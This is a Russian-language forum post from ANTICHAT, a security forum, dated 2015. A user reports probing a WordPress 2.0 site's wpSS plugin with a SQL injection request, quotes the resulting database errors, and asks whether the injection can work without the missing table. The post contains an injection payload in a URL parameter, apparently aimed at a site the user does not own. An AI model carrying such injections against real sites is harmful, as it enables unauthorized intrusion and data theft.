Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

17.12.2015, 01:01

sats

Новичок

Регистрация: 07.11.2006

Сообщений: 4

Провел на форуме:
29670

Репутация: 0

Может кто пнет в нужном направлении!!! - есть сайт на wordpress 2.0(php 5.4.4) c установленным плагином wpSS (www.securityfocus.com/bid/28894/exploit), использовал запрос следующего вида - wp-content/plugins/wpSS/ss_handler.php?display=0&edit=&ss_id=1%27", однако при попытке провести SQL инжект приходят ошибки от wordpress. волнует сообщение которое сообщает об отсутствии таблицы(выделено красным)

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"'' at line 1]

SELECT * FROM wp_spreadsheet WHERE id='1'"'

WordPress database error: [Table 'wordpress.wp_spreadsheet' doesn't exist]

INSERT INTO wp_spreadsheet (ss_tablehtml, ss_name, ss_description) VALUES ('

', 'New', 'Blank spreadsheet');

WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''"' at line 1]

SELECT * FROM wp_spreadsheet WHERE id = 1'";

В связи с этим вопрос гуру SQL - возможно ли провести полноценный инжект без данной таблицы, или искать новую уязвимость?